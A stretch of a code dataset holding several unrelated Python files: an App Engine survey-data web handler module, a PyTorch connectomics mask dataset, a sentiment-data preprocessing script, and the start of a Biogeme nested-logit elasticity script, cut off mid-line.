* FROM SurveyData WHERE __key__ = :1\", db_key).get()\n\t\t\t\te = {}\n\t\t\t\ttry:\n\t\t\t\t\te['photo'] = 'http://' + base_url + \"/get_image_thumb?key=\" + str(s.photo_ref.key());\n\t\t\t\texcept (AttributeError):\n\t\t\t\t\te['photo'] = ''\n\t\t\t\te['latitude'] = s.latitude\n\t\t\t\te['longitude'] = s.longitude\n\t\t\t\te['stressval'] = s.stressval\n\t\t\t\te['category'] = s.category\n\t\t\t\te['subcategory'] = s.subcategory\n\t\t\t\te['comments'] = s.comments\n\t\t\t\te['key'] = str(s.key())\n\t\t\t\te['version'] = s.version\n\t\t\t\tif s.hasphoto:\n\t\t\t\t\te['photo_key'] = str(s.photo_ref.key())\n\t\t\t\telse:\n\t\t\t\t\te['photo_key'] = None\n\t\t\t\tself.response.out.write(json.dumps(e))\n\t\t\t\treturn\n\n\t\t\texcept (db.Error):\n\t\t\t\tself.response.out.write(\"No data has been uploaded :[\")\n\t\t\t\treturn\n\t\tself.response.out.write(\"No data has been uploaded :[\")\n\t# end get method\n# End GetAPoint Class\n\n# handler for: /get_an_image\nclass GetAnImage(webapp.RequestHandler):\n\t# input: key - datastore key from SurveyPhoto \n\t# returns image as jpeg\n\tdef get(self):\n\t\treq_key = self.request.get('key')\n\t\tif req_key != '':\n\t\t\ttry :\n\t\t\t\tdb_key = db.Key(req_key)\n\t\t\t\ts = db.GqlQuery(\"SELECT * FROM SurveyPhoto WHERE __key__ = :1\", db_key).get()\n\t\t\t\tif s:\n\t\t\t\t\tself.response.headers['Content-type'] = 'image/jpeg'\n\t\t\t\t\tself.response.headers['Last-Modified'] = s.timestamp.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n\t\t\t\t\tx = datetime.datetime.utcnow() + datetime.timedelta(days=30)\n\t\t\t\t\tself.response.headers['Expires'] = x.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n\t\t\t\t\tself.response.headers['Cache-Control'] = 'public, max-age=315360000'\n\t\t\t\t\tself.response.headers['Date'] = datetime.datetime.utcnow() \n\t\t\t\t\n\t\t\t\t\tself.response.out.write(s.photo)\n\t\t\t\telse:\n\t\t\t\t\tself.response.set_status(401, 'Image not found.')\n\t\t\texcept (db.Error):\n\t\t\t\tself.response.set_status(401, 'Image not found.')\n\t\telse:\n\t\t\tself.response.set_status(401, 'No Image requested.')\n\t# end get method\n# End GetAnImage Class\n\n# handler for: /get_a_thumb\nclass GetAThumb(webapp.RequestHandler):\n\t# input: key - datastore key from SurveyPhoto \n\t# returns image as jpeg\n\tdef get(self):\n\t\treq_key = self.request.get('key')\n\t\tif req_key != '':\n\t\t\ttry :\n\t\t\t\tdb_key = db.Key(req_key)\n\t\t\t\ts = db.GqlQuery(\"SELECT * FROM SurveyPhoto WHERE __key__ = :1\", db_key).get()\n\t\t\t\tif s:\n\t\t\t\t\tself.response.headers['Content-type'] = 'image/jpeg'\n\t\t\t\t\tself.response.headers['Last-Modified'] = s.timestamp.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n\t\t\t\t\tx = datetime.datetime.now() + datetime.timedelta(days=30)\n\t\t\t\t\tself.response.headers['Expires'] = x.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n\t\t\t\t\tself.response.headers['Cache-Control'] = 'public, max-age=315360000'\n\t\t\t\t\tself.response.headers['Date'] = datetime.datetime.utcnow() \n\t\t\t\t\tself.response.out.write(s.thumb)\n\t\t\t\telse:\n\t\t\t\t\tself.response.set_status(401, 'Image not found.')\n\t\t\texcept (db.Error):\n\t\t\t\tself.response.set_status(401, 'Image not found.')\n\t\telse:\n\t\t\tself.response.set_status(401, 'No Image requested.')\n\t# end get method\n# End GetAnImage Class\n\n# handler for: /get_image_thumb\nclass GetImageThumb(webapp.RequestHandler):\n\t# input: key - datastore key from SurveyPhoto \n\tdef get(self):\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = os.environ['HTTP_HOST']\n\t\telse:\n\t\t\tbase_url = os.environ['SERVER_NAME']\n\n\t\tself.response.headers['Content-type'] = 'text/html'\n\t\treq_key = self.request.get('key')\n\t\tself.response.out.write(\"\")\n\t# end get method\n# end GetImageThumb Class\n\n# list data page: /data\nclass DataByDatePage(webapp.RequestHandler):\n\t# display data in table format\n\t# TODO: page results\n\tdef get(self):\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = 'http://' + os.environ['HTTP_HOST'] + '/'\n\t\telse:\n\t\t\tbase_url = 'http://' + os.environ['SERVER_NAME'] + '/'\n\n\t\t# get bookmark\n\t\tbookmark = self.request.get('bookmark')\n\n\t\tlogging.debug(self.request.get('bookmark'))\n\n\t\ttemplate_values = { 'base_url' : base_url }\n\n\t\tforward = True\n\n\t\tpage = None\n\n\t\t# check if page set\n\t\tif self.request.get('page'):\n\t\t\tpage = int(self.request.get('page'))\n\t\telif not bookmark:\n\t\t\tpage = 1\n\n\t\t# fetch cached values if any\n\t\tsaved = None\n\t\textracted = None\n\n\t\t# if page set, and page in range, get page for cache\n\t\tif page > 0 and page <=5: \n\t\t\tsaved = memcache.get('saved')\n\n\t\t\t# if not in cache, try fetching from datastore\n\t\t\tif not saved:\n\t\t\t\tlogging.debug('cache miss, populate')\n\t\t\t\t# get 5 pages of most recent records and cache\n\t\t\t\tsurveys = SurveyData.all().order('-timestamp').fetch(PAGE_SIZE*5 + 1)\n\t\t\t\tsaved = helper.extract_surveys (surveys)\n\t\t\t\t# if values returned, save in cache\n\t\t\t\tif surveys is not None:\n\t\t\t\t\tmemcache.set('saved', saved)\n\n\t\t\t# if data, setup display\n\t\t\tif saved:\n\t\t\t\t# get page\n\t\t\t\textracted = helper.get_page_from_cache(saved, page, PAGE_SIZE)\n\n\t\t\t\tlogging.debug(len(extracted))\n\n\t\t\t\t# if got page\n\t\t\t\tif extracted is not None:\n\t\t\t\t\tif len(extracted) == PAGE_SIZE + 1:\n\t\t\t\t\t\ttemplate_values['next'] = str(extracted[-1]['realtime'])\n\t\t\t\t\t\ttemplate_values['nextpage'] = page + 1\n\t\t\t\t\t\textracted = extracted[:PAGE_SIZE-1]\n\n\t\t\t\t\t# if not on first page, setup back \n\t\t\t\t\tif page > 1:\n\t\t\t\t\t\ttemplate_values['back'] = str(extracted[0]['realtime'])\n\t\t\t\t\t\ttemplate_values['backpage'] = page - 1\n\n\n\t\telse: # pages beyond 5th not cached\n\t\t\tlogging.debug('not using cache')\n\t\t\t# determine direction to retreive records\n\t\t\t# if starts with '-', going backwards\n\t\t\tif bookmark.startswith('-'):\n\t\t\t\tforward = False\n\t\t\t\tbookmark = bookmark[1:]\n\t\t\t\n\t\t\t# if bookmark set, retrieve page relative to bookmark\n\t\t\tif bookmark:\n\t\t\t\t# string to datetime code from:\n\t\t\t\t#\thttp://aralbalkan.com/1512\n\t\t\t\tm = re.match(r'(.*?)(?:\\.(\\d+))?(([-+]\\d{1,2}):(\\d{2}))?$',\n\t\t\t\t\tstr(bookmark))\n\t\t\t\tdatestr, fractional, tzname, tzhour, tzmin = m.groups()\n\t\t\t\tif tzname is None:\n\t\t\t\t\ttz = None\n\t\t\t\telse:\n\t\t\t\t\ttzhour, tzmin = int(tzhour), int(tzmin)\n\t\t\t\t\tif tzhour == tzmin == 0:\n\t\t\t\t\t\ttzname = 'UTC'\n\t\t\t\t\ttz = FixedOffset(timedelta(hours=tzhour,\n\t\t\t\t\t\t\t\t\t\t\t minutes=tzmin), tzname)\n\t\t\t\tx = datetime.datetime.strptime(datestr, \"%Y-%m-%d %H:%M:%S\")\n\t\t\t\tif fractional is None:\n\t\t\t\t\tfractional = '0'\n\t\t\t\t\tfracpower = 6 - len(fractional)\n\t\t\t\t\tfractional = float(fractional) * (10 ** fracpower)\n\t\t\t\tdt = x.replace(microsecond=int(fractional), tzinfo=tz)\n\n\n\t\t\t\tif forward:\n\t\t\t\t\tsurveys = SurveyData.all().filter('timestamp <', dt).order('-timestamp').fetch(PAGE_SIZE+1)\n\t\t\t\t\t# if PAGE_SIZE + 1 rows returned, more pages to display\n\t\t\t\t\tif len(surveys) == PAGE_SIZE + 1:\n\t\t\t\t\t\ttemplate_values['next'] = str(surveys[-2].timestamp)\n\t\t\t\t\t\tif page is not None:\n\t\t\t\t\t\t\tlogging.debug(page)\n\t\t\t\t\t\t\ttemplate_values['nextpage'] = page + 1\n\t\t\t\t\t\tsurveys = surveys[:PAGE_SIZE]\n\n\t\t\t\t\t# if bookmark set, assume there was a back page\n\t\t\t\t\ttemplate_values['back'] = '-'+str(surveys[0].timestamp)\n\t\t\t\t\tif page is not None:\n\t\t\t\t\t\ttemplate_values['backpage'] = page - 1\n\t\t\t\telse:\n\t\t\t\t\tsurveys = SurveyData.all().filter('timestamp >', dt).order('timestamp').fetch(PAGE_SIZE+1)\n\t\t\t\t\t# if PAGE_SIZE + 1 rows returned, more pages to diplay\n\t\t\t\t\tif len(surveys) == PAGE_SIZE + 1:\n\t\t\t\t\t\ttemplate_values['back'] = '-'+str(surveys[-2].timestamp)\n\t\t\t\t\t\tif page is not None:\n\t\t\t\t\t\t\ttemplate_values['backpage'] = page - 1\n\t\t\t\t\t\tsurveys = surveys[:PAGE_SIZE]\n\t\t\t\t\t# if bookmark set, assume there is a next page\n\t\t\t\t\ttemplate_values['next'] = str(surveys[0].timestamp)\n\t\t\t\t\tif page is not None:\n\t\t\t\t\t\ttemplate_values['nextpage'] = page + 1\n\t\t\t\t\t# reverse order of results since they were returned backwards by query\n\t\t\t\t\tsurveys.reverse()\n\t\t\telse: # if no bookmark set, retrieve first records\n\t\t\t\tsurveys = SurveyData.all().order('-timestamp').fetch(PAGE_SIZE+1)\n\t\t\t\tif len(surveys) == PAGE_SIZE + 1:\n\t\t\t\t\ttemplate_values['next'] = str(surveys[-2].timestamp)\n\t\t\t\t\ttemplate_values['nextpage'] = 2\n\t\t\t\t\tsurveys = surveys[:PAGE_SIZE]\n\n\t\t\textracted = helper.extract_surveys (surveys)\n\n\t\ttemplate_values['surveys'] = extracted \n\t\ttemplate_values['data'] = True\n\n\t\tpath = os.path.join (os.path.dirname(__file__), 'views/data.html')\n\t\tself.response.out.write (helper.render(self, path, template_values))\n\t# end get method\n# End DataPage Class\n\n# handler for: /data_download_all.csv\nclass DownloadAllData(webapp.RequestHandler):\n\t# returns csv of all data\n\tdef get(self):\n\t\t# check cache for csv dump\n\t\t# I'm not sure at what point this will become infesible (too large for the cache)\n\t\tdata = memcache.get('csv')\n\t\t\n\n\t\t# if all data in cache, output and done\n\t\tif data is not None:\n\t\t\tself.response.headers['Content-type'] = 'text/csv'\n\t\t\tself.response.out.write(data)\n\t\t\treturn\n\n\t\t# if cache miss, check if csv blob exist\n\t\tdata_csv = SurveyCSV.all().filter('page =', 1).get()\n\n\t\t# if csv blob exist, set in cache and output\n\t\tif data_csv is not None:\n\t\t\t# add to cache for 1 week\n\t\t\t#memcache.set('csv', data_csv.csv, 604800)\n\t\t\tmemcache.set('csv', data_csv.csv)\n\n\t\t\tself.response.headers['Content-type'] = 'text/csv'\n\t\t\tself.response.out.write(data_csv.csv)\n\t\t\treturn\n\n\t\t'''\n\t\t# you should never get here except for the first time this url is called\n\t\t# if you need to populate the blob, make sure to call this url\n\t\t#\tbefore any requests to write new data or the blob will start from that entry instead\n\t\t# NOTE: this will probably only work as long as the number of entries in your survey is low\n\t\t#\tIf there are too many entries already, this will likely time out\n\t\t#\tI have added page as a property of the model incase we need it in future\n\t\tsurveys = SurveyData.all().order('timestamp').fetch(1000)\n\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = os.environ['HTTP_HOST']\n\t\telse:\n\t\t\tbase_url = os.environ['SERVER_NAME']\n\n\t\tcounter = 0\n\t\tlast_entry_date = ''\n\t\tpage = 1\n\n\t\t# setup csv\n\t\toutput = cStringIO.StringIO()\n\t\twriter = csv.writer(output, delimiter=',')\n\n\t\theader_row = [\t'id',\n\t\t\t\t\t\t'userid', \n\t\t\t\t\t\t'timestamp',\n\t\t\t\t\t\t'latitude',\n\t\t\t\t\t\t'longitude',\n\t\t\t\t\t\t'stress_value',\n\t\t\t\t\t\t'category',\n\t\t\t\t\t\t'subcategory',\n\t\t\t\t\t\t'comments',\n\t\t\t\t\t\t'image_url'\n\t\t\t\t\t\t]\n\n\t\twriter.writerow(header_row)\n\t\tfor s in surveys:\n\t\t\tphoto_url = ''\n\t\t\tif s.hasphoto:\n\t\t\t\ttry:\n\t\t\t\t\tphoto_url = 'http://' + base_url + \"/get_an_image?key=\"+str(s.photo_ref.key())\n\t\t\t\texcept:\n\t\t\t\t\tphoto_url = 'no_image'\n\n\t\t\telse:\n\t\t\t\tphoto_url = 'no_image'\n\n\t\t\thashedval = hashlib.sha1(str(s.key()))\n\t\t\tsha1val = hashedval.hexdigest()\n\n\t\t\tusersha1val = ''\n\t\t\tif s.username is not None:\n\t\t\t\tuserhashedval = hashlib.sha1(s.username)\n\t\t\t\tusersha1val = userhashedval.hexdigest()\n\t\t\telse:\n\t\t\t\tusersha1val = 'none'\n\n\t\t\tnew_row = [\n\t\t\t\t\tsha1val,\n\t\t\t\t\tusersha1val,\n\t\t\t\t\ts.timestamp,\n\t\t\t\t\ts.latitude,\n\t\t\t\t\ts.longitude,\n\t\t\t\t\ts.stressval,\n\t\t\t\t\ts.category,\n\t\t\t\t\ts.subcategory,\n\t\t\t\t\ts.comments,\n\t\t\t\t\tphoto_url\n\t\t\t\t\t]\n\t\t\twriter.writerow(new_row)\n\t\t\tcounter += 1\n\t\t\tlast_entry_date = s.timestamp\n\n\t\t# write blob csv so we dont have to do this again\n\t\tinsert_csv = SurveyCSV()\n\t\tinsert_csv.csv = db.Text(output.getvalue())\n\t\tinsert_csv.last_entry_date = last_entry_date\n\t\tinsert_csv.count = counter\n\t\tinsert_csv.page = page\n\t\tinsert_csv.put()\n\n\t\t# add to cache for 1 week (writes should update this cached value)\n\t\t#memcache.set('csv', output.getvalue(), 604800)\n\t\tmemcache.set('csv', output.getvalue())\n\n\t\tself.response.headers['Content-type'] = 'text/csv'\n\t\tself.response.out.write(output.getvalue())\n\t\t'''\n\t# end get method\n# End DownloadAllData\n\n# handler for: /summary\n# displays count of each category\nclass SummaryHandler(webapp.RequestHandler):\n\tdef get(self):\n\t\tself.handle()\n\t# end get method\n\n\tdef post(self):\n\t\tself.handle()\n\t# end post method\n\n\tdef handle(self):\n\t\tresult = SubCategoryStat().all()\n\n\t\tcategories = {}\n\n\t\tfor row in result:\n\t\t\tif not categories.has_key(row.category):\n\t\t\t\tcategories[row.category] = {\n\t\t\t\t\t\t'category':row.category,\n\t\t\t\t\t\t'count':row.count,\n\t\t\t\t\t\t'total':row.total\n\t\t\t\t\t\t}\n\t\t\t\tif row.count != 0:\n\t\t\t\t\tcategories[row.category]['average'] = row.total/row.count\n\t\t\t\telse:\n\t\t\t\t\tcategories[row.category]['average'] = 0\n\n\t\t\t\tcategories[row.category]['subcategories'] = {}\n\t\t\telse:\n\t\t\t\tcategories[row.category]['count'] += row.count\n\t\t\t\tcategories[row.category]['total'] += row.total\n\t\t\t\tif categories[row.category]['total'] != 0:\n\t\t\t\t\tcategories[row.category]['average'] = \\\n\t\t\t\t\t\tcategories[row.category]['total'] / categories[row.category]['count']\n\n\t\t\tif not categories[row.category]['subcategories'].has_key(row.subcategory):\n\t\t\t\tsubavg = 0\n\t\t\t\tif row.count != 0:\n\t\t\t\t\tsubavg = row.total / row.count\n\t\t\t\tcategories[row.category]['subcategories'][row.subcategory] = { \n\t\t\t\t\t\t'subcategory':row.subcategory, \n\t\t\t\t\t\t'count':row.count,\n\t\t\t\t\t\t'total':row.total,\n\t\t\t\t\t\t'average':subavg \n\t\t\t\t\t\t}\n\t\t\telse:\n\t\t\t\tcategories[row.category]['subcategories'][row.subcategory]['count'] += row.count\n\t\t\t\tcategories[row.category]['subcategories'][row.subcategory]['total'] += row.total\n\t\t\t\tif categories[row.category]['subcategories'][row.subcategory]['total'] != 0:\n\t\t\t\t\tcategories[row.category]['subcategories'][row.subcategory]['average'] = \\\n\t\t\t\t\t\tcategories[row.category]['subcategories'][row.subcategory]['total'] / categories[row.category]['subcategories'][row.subcategory]['count']\n\n\t\tdata = []\n\t\tfor key,cat in categories.items():\n\t\t\tcat['subcatlist'] = []\n\n\t\t\tfor skey,scat in cat['subcategories'].items():\n\t\t\t\tcat['subcatlist'].append(scat)\n\n\t\t\tdel cat['subcategories']\n\t\t\tdel cat['total']\n\t\t\tdata.append(cat)\n\t\t\t#newrow = {}\n\n\t\t\t#ewrow['category'] = cat['category']\n\t\t\t#newrow['count'] = cat['count']\n\t\t\t#newrow['average'] = cat['average']\n\n\n\t\ttemplate_values = { 'summary' : data }\n\t\ttemplate_values['datasummary'] = True\n\t\ttemplate_values['divstyle'] = ['span-11 colborder','span-12 last']\n\n\t\tlogging.debug(template_values)\n\n\t\tpath = os.path.join (os.path.dirname(__file__), 'views/summary.html')\n\t\tself.response.out.write (helper.render(self, path, template_values))\n\t# end handle method\n# End SummaryHandler Class\n","sub_path":"appengine/displaydata.py","file_name":"displaydata.py","file_ext":"py","file_size_in_byte":17079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"18175015","text":"from __future__ import print_function, division\nimport numpy as np\n\nimport torch\nimport torch.utils.data\n\nfrom .misc import crop_volume, rebalance_binary_class\n\nfrom scipy.ndimage import label as scipy_label\nimport scipy.ndimage.morphology as morphology\n\nclass MaskDataset(torch.utils.data.Dataset):\n \"\"\"PyTorch ddataset class for affinity graph prediction.\n\n Args:\n volume: input image stacks.\n label: segmentation stacks.\n sample_input_size (tuple, int): model input size.\n sample_label_size (tuple, int): model output size.\n sample_stride (tuple, int): stride size for sampling.\n augmentor: data augmentor.\n mode (str): training or inference mode.\n \"\"\"\n def __init__(self,\n volume, label=None,\n sample_input_size=(8, 64, 64),\n sample_label_size=None,\n sample_stride=(1, 1, 1),\n augmentor=None,\n mode='train',\n seed_points=None,\n pad_size=None,\n multisegment_gt=True):\n if mode == 'test':\n for x in seed_points:\n assert len(x) == 1\n\n self.mode = mode\n self.input = volume\n self.label = label\n self.augmentor = augmentor # data augmentation\n\n # samples, channels, depths, rows, cols\n self.input_size = [np.array(x.shape) for x in self.input] # volume size, could be multi-volume input\n self.sample_input_size = np.array(sample_input_size) # model input size\n self.sample_label_size = np.array(sample_label_size) # model label size\n\n self.seed_points = seed_points\n self.half_input_sz = (sample_input_size//2)\n self.seed_points_offset = pad_size - self.half_input_sz\n self.sample_num = np.array([(np.sum([y.shape[0] for y in x])) for x in self.seed_points])\n self.sample_num_a = np.sum(self.sample_num)\n self.sample_num_c = np.cumsum([0] + list(self.sample_num))\n\n # specifies if there are multiple segments in the GT, if yes then we need to keep only the central segment while calling get_item\n self.multisegment_gt = multisegment_gt\n\n def __len__(self): # number of seed points\n return self.sample_num_a\n\n def __getitem__(self, index):\n vol_size = self.sample_input_size\n valid_mask = None\n\n # Train Mode Specific Operations:\n if self.mode == 'train':\n # 2. get input volume\n seed = np.random.RandomState(index)\n # if elastic deformation: need different receptive field\n # change vol_size first\n pos = self.get_pos_seed(seed)\n out_label = crop_volume(self.label[pos[0]], vol_size, pos[1:])\n out_input = crop_volume(self.input[pos[0]], vol_size, pos[1:])\n\n # select the center segment and delete the rest\n # this is needed only for parallel fibers, for the single neuron prediction only perform cc and remove\n # the non central segments\n if self.multisegment_gt:\n out_label = self.keep_seg(out_label, out_label[tuple(self.half_input_sz)])\n\n # Remove non central segment\n out_label = self.remove_non_central_seg(out_label)\n\n # 3. augmentation\n if self.augmentor is not None: # augmentation\n data = {'image':out_input, 'label':out_label.astype(np.float32)}\n augmented = self.augmentor(data, random_state=seed)\n out_input, out_label = augmented['image'], augmented['label']\n out_input = out_input.astype(np.float32)\n out_label = out_label.astype(np.float32)\n\n # Test Mode Specific Operations:\n elif self.mode == 'test':\n # test mode\n pos = self.get_pos_test(index)\n out_input = crop_volume(self.input[pos[0]], vol_size, pos[1:])\n out_label = None if self.label is None else crop_volume(self.label[pos[0]], vol_size, pos[1:])\n\n if out_label is not None:\n out_label = torch.from_numpy(out_label) # did not create a copy because remove non central seg creates a copy\n out_label = out_label.unsqueeze(0)\n\n # Turn input to Pytorch Tensor, unsqueeze once to include the channel dimension:\n out_input = torch.from_numpy(out_input.copy())\n out_input = out_input.unsqueeze(0)\n\n if self.mode == 'train':\n\t\t\t# TODO if masked loss around center is needed use this mask for rebalancing\n # mask = morphology.binary_dilation(out_label[0].numpy(), structure=np.ones((5, 5, 5)))\n # mask = mask.astype(np.float32)\n\n # Rebalancing\n temp = 1.0 - out_label.clone()\n weight_factor, weight = rebalance_binary_class(temp, mask=None) # torch.from_numpy(mask)\n return pos, out_input, out_label, weight, weight_factor\n\n else:\n return pos, out_input\n\n def get_pos_dataset(self, index):\n return np.argmax(index < self.sample_num_c) - 1 # which dataset\n\n def get_pos_seed(self, seed, offset=None):\n pos = [0, 0, 0, 0]\n # pick a dataset\n did = self.get_pos_dataset(seed.randint(self.sample_num_a))\n pos[0] = did\n # pick a mask bin\n # p = [0.45, 0.15, 0.10, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05]\n size_bin = np.random.choice(len(self.seed_points[did]))\n # pick a index\n idx = np.random.randint(self.seed_points[did][size_bin].shape[0])\n # pick a position\n if offset is None:\n pos[1:] = self.seed_points[did][size_bin][idx] + self.seed_points_offset\n else:\n pos[1:] = self.seed_points[did][size_bin][idx] + offset\n return pos\n\n def get_pos_test(self, index):\n did = self.get_pos_dataset(index)\n idx = index - self.sample_num_c[did]\n pos = self.seed_points[did][0][idx]\n pos = pos + self.seed_points_offset\n return np.concatenate(([did], pos))\n\n def get_vol(self, pos):\n out_input = crop_volume(self.input[pos[0]], self.sample_input_size, pos[1:])\n out_input = torch.from_numpy(out_input.copy())\n out_input = out_input.unsqueeze(0)\n return out_input\n\n def keep_seg(self, label, seg_id_to_keep):\n return label == seg_id_to_keep\n\n def remove_non_central_seg(self, label):\n out_label, _ = scipy_label(label)\n\n if out_label[tuple(self.half_input_sz)] == 0:\n print('Center pixel is not inside 2nd inference\\'s GT segmentation.')\n print('This probably happened due to augmentation')\n # Find nearby segment id and use that for now\n seg_ids = np.unique(out_label[self.half_input_sz[0]-5:self.half_input_sz[0]+6,\n self.half_input_sz[1]-5:self.half_input_sz[1]+6,\n self.half_input_sz[2]-5:self.half_input_sz[2]+6])\n seg_ids = seg_ids[seg_ids > 0]\n if seg_ids.shape[0] > 1:\n print('More than 1 disconnected segments near the center. This should have never happened!')\n print('Using the first segment')\n c_seg_id = seg_ids[0]\n out_label = (out_label == c_seg_id)\n else:\n out_label = (out_label == out_label[tuple(self.half_input_sz)])\n\n return out_label\n","sub_path":"torch_connectomics/data/dataset/dataset_mask.py","file_name":"dataset_mask.py","file_ext":"py","file_size_in_byte":7403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556006839","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 21 13:45:57 2017\n\n@author: masoud\n\"\"\"\nfrom nltk.corpus import stopwords\nimport random\n\n\n\npathp= '/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/test'\n#pathn = '/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/negative.review'\ndata = open(pathp, 'r').read().split('\\n')\ndata = [line for line in data if line.rstrip()]\n#datan = open(pathp, 'r').read().split('\\n')\ndic_name = 'vocab_mds_book'\ndictionary = []\npre_data = []\nrandom.shuffle(data)\n\n\"building ditionary and preprocess the data\"\nfor line in data: \n temp = []\n line = line.split()\n lable = line[-1]\n lable = lable.split(':')[1] \n line.remove(line[-1])\n if lable == 'positive':\n temp.append('1')\n elif lable == 'negative':\n temp.append('2')\n for word in line:\n wrd = word.split(':')[0]\n if wrd not in stopwords.words('english'):\n temp.append(word)\n if wrd not in dictionary:\n dictionary.append(wrd)\n tmp = ' '.join(str(i) for i in temp )\n pre_data.append(tmp)\ndel word, wrd, temp,tmp, line, pathp, data, lable\n\n\n\"save dictionary\"\nfile = open('/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/'+ dic_name, 'w')\nrandom.shuffle(dictionary)\nflag = 1\nfor word in dictionary:\n if flag == 1: \n flag = 2\n file.write(\"%s\" %word)\n else:\n file.write('\\n')\n file.write(\"%s\" %word)\ndel flag, word,dic_name\nfile.close()\n\n\n\"save preprocessed data\"\nfile = open('/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/pre_data', 'w')\nflag = 1\nfor line in pre_data:\n if flag == 1:\n flag = 2\n file.write(\"%s\" %line)\n elif flag == 2:\n file.write(\"\\n%s\"%line)\nfile.close()\n \n \n\"create and save libsvm file\"\nlib = []\nfor line in pre_data:\n temp = []\n line = line.split()\n temp.append(line[0])\n line.remove(line[0])\n for item in line:\n id = dictionary.index(item.split(':')[0])+1\n cnt= item.split(':')[1] \n value = str(id)+':'+ str(cnt)\n temp.append(value)\n temp = ' '.join(str(i) for i in temp) \n lib.append(temp)\nfile = open('/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/lib', 'w')\nflag = 1\nfor line in lib:\n if flag == 1:\n flag = 2\n file.write(\"%s\" %line)\n elif flag == 2:\n file.write(\"\\n%s\" %line)\nfile.close()\ndel flag, id, item, cnt, line, temp, value\n","sub_path":"mds.py","file_name":"mds.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"76727242","text":"\"\"\"File 05nestedElasticitiesConfidenceIntervals.py\n\n:author: Michel Bierlaire, EPFL\n:date: Wed Sep 11 15:57:46 2019\n\n We use a previously estimated nested logit model.\n Three alternatives: public transporation, car and slow modes.\n RP data.\n We calculate disaggregate and aggregate direct arc elasticities, and\n the confidence intervals.\n\"\"\"\n\nimport sys\nimport pandas as pd\nimport biogeme.database as db\nimport biogeme.biogeme as bio\nfrom biogeme import models\nimport biogeme.results as res\nfrom biogeme.expressions import Beta\n\n# Calculate confidence intervals for elasticities requires interval arithmetics\n# Use 'pip install pyinterval' if not available on your system.\n# Warning: other types of interval packages are also available.\ntry:\n import interval as ia\nexcept ModuleNotFoundError:\n print('Use \"pip install pyinterval\" to install a requested package')\n sys.exit()\n\n# Read the data\ndf = pd.read_csv('optima.dat', sep='\\t')\ndatabase = db.Database('optima', df)\n\n# The following statement allows you to use the names of the variable\n# as Python variable.\nglobals().update(database.variables)\n\n# Exclude observations such that the chosen alternative is -1\ndatabase.remove(Choice == -1.0)\n\n# Normalize the weights\nsumWeight = database.data['Weight'].sum()\nnumberOfRows = database.data.shape[0]\nnormalizedWeight = Weight * numberOfRows / sumWeight\n\n# Calculate the number of accurences of a value in the database\nnumberOfMales = database.count('Gender', 1)\nprint(f'Number of males: {numberOfMales}')\n\nnumberOfFemales = database.count('Gender', 2)\nprint(f'Number of females: {numberOfFemales}')\n\n# For more complex conditions, using directly Pandas\nunreportedGender = database.data[\n (database.data['Gender'] != 1) & (database.data['Gender'] != 2)\n].count()['Gender']\nprint(f'Unreported gender: {unreportedGender}')\n\n\n# List of parameters. Their value will be set later.\nASC_CAR = Beta('ASC_CAR', 0, None, None, 0)\nASC_PT = Beta('ASC_PT', 0, None, None, 1)\nASC_SM = Beta('ASC_SM', 0, None, None, 0)\nBETA_TIME_FULLTIME = Beta('BETA_TIME_FULLTIME', 0, None, None, 0)\nBETA_TIME_OTHER = Beta('BETA_TIME_OTHER', 0, None, None, 0)\nBETA_DIST_MALE = Beta('BETA_DIST_MALE', 0, None, None, 0)\nBETA_DIST_FEMALE = Beta('BETA_DIST_FEMALE', 0, None, None, 0)\nBETA_DIST_UNREPORTED = Beta('BETA_DIST_UNREPORTED', 0, None, None, 0)\nBETA_COST = Beta('BETA_COST', 0, None, None, 0)\n\n# Define new variables. Must be consistent with estimation results.\nTimePT_scaled = TimePT / 200\nTimeCar_scaled = TimeCar / 200\nMarginalCostPT_scaled = MarginalCostPT / 10\nCostCarCHF_scaled = CostCarCHF / 10\ndistance_km_scaled = distance_km / 5\nmale = Gender == 1\nfemale = Gender == 2\nunreportedGender = Gender == -1\nfulltime = OccupStat == 1\nnotfulltime = OccupStat != 1\n\n# Definition of utility functions:\nV_PT = (\n ASC_PT\n + BETA_TIME_FULLTIME * TimePT_scaled * fulltime\n + BETA_TIME_OTHER * TimePT_scaled * notfulltime\n + BETA_COST * MarginalCostPT_scaled\n)\nV_CAR = (\n ASC_CAR\n + BETA_TIME_FULLTIME * TimeCar_scaled * fulltime\n + BETA_TIME_OTHER * TimeCar_scaled * notfulltime\n + BETA_COST * CostCarCHF_scaled\n)\nV_SM = (\n ASC_SM\n + BETA_DIST_MALE * distance_km_scaled * male\n + BETA_DIST_FEMALE * distance_km_scaled * female\n + BETA_DIST_UNREPORTED * distance_km_scaled * unreportedGender\n)\n\n# Associate utility functions with the numbering of alternatives\nV = {0: V_PT, 1: V_CAR, 2: V_SM}\n\n# Definition of the nests:\n# 1: nests parameter\n# 2: list of alternatives\n\nMU_NOCAR = Beta('MU_NOCAR', 1.0, 1.0, None, 0)\nCAR_NEST = 1.0, [1]\nNO_CAR_NEST = MU_NOCAR, [0, 2]\nnests = CAR_NEST, NO_CAR_NEST\n\n# The choice model is a nested logit\nprob_pt = models.nested(V, None, nests, 0)\nprob_car = models.nested(V, None, nests, 1)\nprob_sm = models.nested(V, None, nests, 2)\n\n# We 